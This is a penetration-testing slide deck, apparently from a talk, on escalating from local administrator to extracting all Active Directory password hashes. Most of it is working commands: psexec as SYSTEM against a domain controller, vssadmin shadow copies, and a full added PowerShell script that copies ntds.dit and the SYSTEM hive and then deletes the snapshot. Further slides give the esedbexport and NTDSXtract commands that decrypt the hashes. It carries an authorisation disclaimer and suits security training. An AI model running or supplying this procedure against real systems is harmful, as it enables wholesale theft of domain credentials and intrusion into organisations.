Fall of a domain | From local admin to Domain user hashes
1. The Fall of a Domain
LOCAL ADMIN TO DOMAIN USER HASHES
Riyaz Walikar
2. Disclaimer
It was far more painstaking and complicated than this!
Demo setup to show execution path
All the commands were actually used in the pentest
Please do not try this on your office/corporate environment without written permission
4. The story so far
Remote RDP access to a machine on the client network via VPN
Local Administrator rights to simulate an employee
User is a limited domain user
Domain controller on the same network, reachable with LDAP services running
6. Local Admin eh?
Locally logged in as TARDIS\fwhite
Limited domain user, but local admin on this box
Other users connected? [Task Manager > Users]
Found another user connected to our system via RDP. Sweet! (possibly a domain admin)
Need SYSTEM privs! Any ideas?
11. Remote CMD anyone?
RDP directly!
Let's be discreet
psexec -s -u TARDIS\atomboy \\10.10.10.1 cmd.exe
Game already over!
Instead RDP with user credentials and present report
13. Let's grab some hashes
Active Directory stores user information in %systemroot%\ntds\ntds.dit
Locked while the directory service is running (held open by lsass), so a plain copy fails
ntdsutil + snapshot = backup (Windows Server 2008 and later)
vssadmin create shadow /for=C: (Windows Server 2003 and later server editions)
14. Let's grab some hashes
Backup readable by nt authority\system and administrators
We need the ntds.dit and SYSTEM files (the SYSTEM registry hive holds the boot key that decrypts the password encryption key inside ntds.dit)
cd / dir / other inbuilt cmd commands do not work on unmounted volume shadow copies
copy works! (address the snapshot by its \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN path)
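The vssadmin route from slides 13 and 14 end to end, as an added example rather than a command from the original talk: snapshot C:, pull ntds.dit and the SYSTEM hive out of the unmounted shadow copy with cmd's copy (the only built-in that accepts the GLOBALROOT path), then delete the snapshot. It must run from an elevated prompt on the DC; the output folder C:\Windows\Temp\dump and the shadow-copy index in the parsed device path are assumptions for the example, not values from the slides.

```powershell
# Added example, not from the original slides. Assumptions: elevated prompt on the DC,
# default NTDS location under %SystemRoot%\NTDS, output folder below is arbitrary.
$OutDir = 'C:\Windows\Temp\dump'
New-Item -ItemType Directory -Path $OutDir -Force | Out-Null

# 1. Create the shadow copy and parse the device path and shadow ID out of vssadmin's output.
$out = & vssadmin.exe create shadow /for=C: 2>&1 | Out-String
if (-not ($out -match 'Shadow Copy Volume Name:\s*(\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\d+)')) {
    throw "vssadmin did not return a shadow copy volume name:`n$out"
}
$ShadowDev = $Matches[1]
$ShadowId  = if ($out -match 'Shadow Copy ID:\s*(\{[0-9a-fA-F-]+\})') { $Matches[1] } else { $null }

# 2. The snapshot is not mounted, so dir/cd fail on it, but copy accepts the \\?\GLOBALROOT path.
#    The Windows directory has the same relative path inside the snapshot as on the live volume.
$rel   = $env:SystemRoot -replace '^[A-Za-z]:', ''      # "C:\Windows" -> "\Windows"
$files = @{
    'ntds.dit' = "${ShadowDev}${rel}\NTDS\ntds.dit"
    'SYSTEM'   = "${ShadowDev}${rel}\System32\config\SYSTEM"
}
foreach ($name in $files.Keys) {
    $src = $files[$name]
    $dst = Join-Path $OutDir $name
    & cmd.exe /c copy /y $src $dst | Out-Null
    if (-not (Test-Path $dst)) { throw "copy of $src failed" }
}

# 3. Alternative for the hive only: an administrator can export the live SYSTEM hive
#    without a snapshot (ntds.dit still needs the snapshot because lsass holds it open).
#    reg.exe save HKLM\SYSTEM (Join-Path $OutDir 'SYSTEM.live')

# 4. Clean up: remove only the shadow copy this script created, leave pre-existing ones alone.
if ($ShadowId) { & vssadmin.exe delete shadows /shadow=$ShadowId /quiet | Out-Null }

Get-ChildItem $OutDir | Select-Object Name, Length
```

Both files then go to the Linux box for the offline parse. Deleting the snapshot afterwards matters on an engagement: a leftover shadow copy is both an artefact for the blue team and a second, unprotected copy of every domain hash sitting on the DC.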
16. NTDS.dit structure parse?
NTDSXtract - A framework for offline forensic analysis of ntds.dit
Needs the libesedb module as well (it exports the ESE database tables that NTDSXtract parses)
libesedb and creddump are bundled in ntds_dump_hash.zip
wget to a linux box (Kali is a good choice)
17. get framework + compile + make + run
wget http://ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
wget http://ntdsxtract.com/downloads/ntds_dump_hash.zip
unzip both
18. get framework + compile + make + run
cd ntds_dump_hash/libesedb
./configure && make
cd libesedb/esedbtools
./esedbexport -l /tmp/ntds.log <ntds.dit>
(writes every table into a <ntds.dit>.export/ directory; the datatable.N and link_table.N files are the two NTDSXtract needs)
19. Yay!
python ../../ntdsxtract/dsusers.py datatable link_table --passwordhashes <system_file> --passwordhistory <system_file>
<system_file> is the SYSTEM hive copied off the DC; its boot key is what decrypts the stored hashes
Cleanup the output into pwdump format with ntdstopwdump.py (https://raw.github.com/inquisb/miscellaneous/master/ntdstopwdump.py)